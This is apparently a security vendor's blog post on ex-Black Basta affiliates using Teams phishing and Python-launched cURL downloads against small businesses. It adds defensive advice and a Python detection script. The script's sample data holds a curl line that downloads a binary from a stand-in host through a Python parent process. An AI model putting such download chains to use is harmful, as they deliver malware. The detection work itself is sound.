Microsoft Teams and Python Scripts: How Ex-Black Basta Hackers Are Targeting SMBs in 2025

Former Black Basta Hackers Target SMBs Using Microsoft Teams and Python Scripts: What You Need to Know

Think Teams messages and routine emails are safe? Think again. A recent escalation in cyberattacks shows former Black Basta ransomware members exploiting Microsoft Teams and Python scripts to breach business networks, putting small and midsize businesses (SMBs) in the crosshairs more than ever (Source).

Why Does This Security Shift Matter to SMBs?

Cybercriminals aren’t just targeting Fortune 500 giants—they know SMBs often lack enterprise-grade protections. Hackers are now infiltrating SMBs through familiar workplace tools like Microsoft Teams, bypassing traditional email defenses and leveraging automated Python scripts to deploy threats. One small slip—like clicking a Teams message—can lead to data theft, downtime, and financial losses.

What’s New About These Attacks?

Researchers at ReliaQuest recently observed former Black Basta affiliates combining their hallmark “email bombing” tactics with Microsoft Teams phishing, then running malicious Python scripts to establish ongoing access. These scripts use cURL commands to quietly download more dangerous files, making infections harder to detect and remediate. If your staff are collaborating via Teams or opening dozens of daily emails, these vectors are likely already at your digital front door.

Fact: 94% of malware is delivered by email, but attacks via collaboration tools like Teams are surging (Verizon DBIR 2024).

How confident are you in your protections beyond email? Book a quick discovery call and we’ll review your Teams security posture—free of charge.

Key Takeaways for SMB Decision-Makers

  • Recognize new phishing channels: Don’t assume Teams is safer than email—user awareness training and Teams-specific security measures are critical.
  • Restrict script execution: Disallow unauthorized Python execution and cURL downloads on endpoints, especially for non-IT users.
  • Enable multi-factor authentication: MFA on both email and Teams makes it drastically harder for attackers to gain persistent access.
  • Monitor suspicious activity: Deploy automated threat detection for abnormal Teams conversations, file transfers, and user behaviors.
  • Have a rapid response plan: Create and test an incident response playbook for email, Teams, and endpoint breaches—speed matters.
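
One way to express the "restrict script execution" and "monitor suspicious activity" takeaways as detection logic, added here as an example and not taken from ReliaQuest, BoltWork or any vendor tool. It walks process ancestry to flag cURL launched from a Python interpreter (even through an intermediate shell) and Python run by users outside an allow-list; the event field names, the allow-list and all sample values are assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

PYTHON = {"python.exe", "pythonw.exe", "py.exe"}
URL_RE = re.compile(r"https?://\S+", re.I)
# curl options that write the response to disk
OUTFILE_RE = re.compile(r"(?:^|\s)(?:-o|-O|--output|--remote-name)(?:\s|=|$)")

# Constructed sample events; field names are assumptions, not a real log schema.
EVENTS = [
    {"pid": 100, "ppid": 1, "user": "CORP\\jdoe", "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 100, "user": "CORP\\jdoe", "image": r"C:\Users\jdoe\Downloads\py\pythonw.exe", "cmd": "pythonw.exe update.py"},
    {"pid": 220, "ppid": 210, "user": "CORP\\jdoe", "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c curl.exe ..."},
    {"pid": 230, "ppid": 220, "user": "CORP\\jdoe", "image": r"C:\Windows\System32\curl.exe", "cmd": r"curl.exe -s -o C:\Users\jdoe\a.bin http://example.invalid/a.bin"},
    {"pid": 300, "ppid": 1, "user": "CORP\\itadmin", "image": r"C:\Python312\python.exe", "cmd": r"python.exe C:\tools\inventory.py"},
    {"pid": 310, "ppid": 100, "user": "CORP\\jdoe", "image": r"C:\Windows\System32\curl.exe", "cmd": "curl.exe https://example.invalid/status"},
]

def python_ancestor(event, by_pid, max_depth=4):
    """Return the nearest Python interpreter above `event`, or None."""
    seen, cur = set(), by_pid.get(event["ppid"])
    for _ in range(max_depth):
        if cur is None or cur["pid"] in seen:  # chain ended or PID loop
            return None
        if basename(cur["image"]).lower() in PYTHON:
            return cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return None

def find_suspicious(events, script_users=frozenset()):
    """Return (rule, pid, detail) tuples for events matching either rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"]).lower()
        # Rule 1: Python started by an account not approved to run scripts
        if name in PYTHON and e["user"] not in script_users:
            findings.append(("python-by-unapproved-user", e["pid"], e["user"]))
        # Rule 2: curl with a Python interpreter somewhere in its ancestry
        if name == "curl.exe" and python_ancestor(e, by_pid):
            urls = URL_RE.findall(e["cmd"])
            rule = "python-curl-download" if OUTFILE_RE.search(e["cmd"]) else "python-curl-request"
            findings.append((rule, e["pid"], urls[0] if urls else None))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(EVENTS, script_users={"CORP\\itadmin"}):
        print(finding)
```
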

How to Secure, Simplify, and Reduce Your Cyber Risk—Fast

This new wave of attacks proves you can’t rely solely on email filtering or antivirus. SMBs need layered protections that adapt to evolving threats:

  • Update policies now: Block macros and scripting tools (like Python, cURL) unless absolutely necessary for business tasks.
  • Review Teams settings: Disable external messages or tightly control who can initiate conversations.
  • Ongoing user training: Run regular, simulated phishing and Teams attack scenarios using realistic examples.
  • Predictable IT costs: Managed services can deploy these improvements and respond swiftly when attacks occur—without costly surprises.

Don’t let the next attack catch your business off guard. BoltWork’s managed cybersecurity services continually update your defenses to stay ahead, letting you focus on your core business—not firefighting digital threats.

Ready to stop ransomware and phishing attacks at the source?
Book a 15-min security consult with BoltWork experts today—get actionable recommendations with no obligation.

References

  • The Hacker News. (2025). Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks.
  • Verizon Data Breach Investigations Report (DBIR). (2024).